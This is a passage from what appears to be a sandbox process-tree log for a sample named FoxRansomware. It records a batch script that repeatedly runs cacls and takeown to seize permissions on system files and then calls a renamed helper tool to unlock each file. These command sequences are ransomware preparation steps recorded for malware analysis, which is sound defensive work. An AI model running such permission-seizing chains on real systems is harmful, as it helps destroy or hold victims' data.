    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    PID:9172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:6632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Modifies file permissions
    PID:6220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:5760
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      PID:9212
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:3272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    PID:9204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      PID:7448
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:5744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:6304
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab""
  2⤵
  PID:6224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:8432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab"
    3⤵
    PID:6504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:6360
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:6596
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Package Cache\{76DEEAB3-122F-4231-83C7-0C35363D02F9}v64.0.4211\dotnet-runtime-8.0.0-win-x64.msi""
  2⤵
  PID:4476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Package Cache\{76DEEAB3-122F-4231-83C7-0C35363D02F9}v64.0.4211\dotnet-runtime-8.0.0-win-x64.msi" /E /G Admin:F /C
    3⤵
    PID:7852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Package Cache\{76DEEAB3-122F-4231-83C7-0C35363D02F9}v64.0.4211\dotnet-runtime-8.0.0-win-x64.msi"
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "dotnet-runtime-8.0.0-win-x64.msi" -nobanner
    3⤵
    PID:8216
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "dotnet-runtime-8.0.0-win-x64.msi" -nobanner
      4⤵
      PID:8496
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi""
  2⤵
  PID:8532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi" /E /G Admin:F /C
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi"
    3⤵
    - Modifies file permissions
    PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "vc_runtimeMinimum_x86.msi" -nobanner
    3⤵
    PID:3092
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "vc_runtimeMinimum_x86.msi" -nobanner
      4⤵
      PID:6508
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl""
  2⤵
  PID:8552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl" /E /G Admin:F /C
    3⤵
    PID:8624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl"
    3⤵
    PID:6796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl" -nobanner
    3⤵
    PID:8232
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl" -nobanner
      4⤵
      PID:8668
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl""
  2⤵
  PID:8604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl" /E /G Admin:F /C
    3⤵
    PID:8664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl"
    3⤵
    PID:8692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl" -nobanner
    3⤵
    PID:8616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "WuProvider.289cd24f-84bd-4d61-8bd4-9dbc2e7cb5cd.1.etl" -nobanner
      4⤵
      PID:8672
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.cd3eaf7a-5d8e-4e57-b66b-06947d0ece01.1.etl""
  2⤵
  PID:6568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.cd3eaf7a-5d8e-4e57-b66b-06947d0ece01.1.etl" /E /G Admin:F /C
    3⤵
    PID:6812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.cd3eaf7a-5d8e-4e57-b66b-06947d0ece01.1.etl"
    3⤵
    PID:9044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MoUsoCoreWorker.cd3eaf7a-5d8e-4e57-b66b-06947d0ece01.1.etl" -nobanner
    3⤵
    PID:8788
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MoUsoCoreWorker.cd3eaf7a-5d8e-4e57-b66b-06947d0ece01.1.etl" -nobanner
      4⤵
      PID:9024
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.adb86b3a-3769-4531-97f7-2acfad3902a2.1.etl""
  2⤵
  PID:8928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.adb86b3a-3769-4531-97f7-2acfad3902a2.1.etl" /E /G Admin:F /C
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.adb86b3a-3769-4531-97f7-2acfad3902a2.1.etl"
    3⤵
    PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "WuProvider.adb86b3a-3769-4531-97f7-2acfad3902a2.1.etl" -nobanner
    3⤵
    PID:9052
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "WuProvider.adb86b3a-3769-4531-97f7-2acfad3902a2.1.etl" -nobanner
      4⤵
      PID:8936
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:6600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:8468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:8916
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:6692
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:6164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    PID:6604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3840
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6660
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    PID:6268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:5156
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4072
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:8376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:5404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:7216
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
  2⤵
  PID:5896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
    3⤵
    - Modifies file permissions
    PID:6940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
    3⤵
    PID:6844
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
      4⤵
      PID:6908
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
  2⤵
  PID:6196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:8180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
    3⤵
    PID:5256
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
      4⤵
      PID:6204
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
  2⤵
  PID:5304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "ThemeSettings2013.xml" -nobanner
    3⤵
    PID:4056
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "ThemeSettings2013.xml" -nobanner
      4⤵
      PID:7712
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b4dbccec-f0f9-4eec-9830-652dbf000302.1.etl""
  2⤵
  PID:5904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b4dbccec-f0f9-4eec-9830-652dbf000302.1.etl" /E /G Admin:F /C
    3⤵
    PID:8136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b4dbccec-f0f9-4eec-9830-652dbf000302.1.etl"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MoUsoCoreWorker.b4dbccec-f0f9-4eec-9830-652dbf000302.1.etl" -nobanner
    3⤵
    PID:8048
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MoUsoCoreWorker.b4dbccec-f0f9-4eec-9830-652dbf000302.1.etl" -nobanner
      4⤵
      PID:3740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.91fee92a-0d87-464d-bf33-4a5e883cba37.1.etl""
  2⤵
  PID:7596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.91fee92a-0d87-464d-bf33-4a5e883cba37.1.etl" /E /G Admin:F /C
    3⤵
    PID:7628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.91fee92a-0d87-464d-bf33-4a5e883cba37.1.etl"
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "WuProvider.91fee92a-0d87-464d-bf33-4a5e883cba37.1.etl" -nobanner
    3⤵
    PID:7704
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "WuProvider.91fee92a-0d87-464d-bf33-4a5e883cba37.1.etl" -nobanner
      4⤵
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:7672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    PID:7236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:8044
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:7668
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:7572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:8248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:7684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:7608
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1852
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:64
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:8040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5488
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:7244
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  2⤵
  PID:4320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\cmd.exe
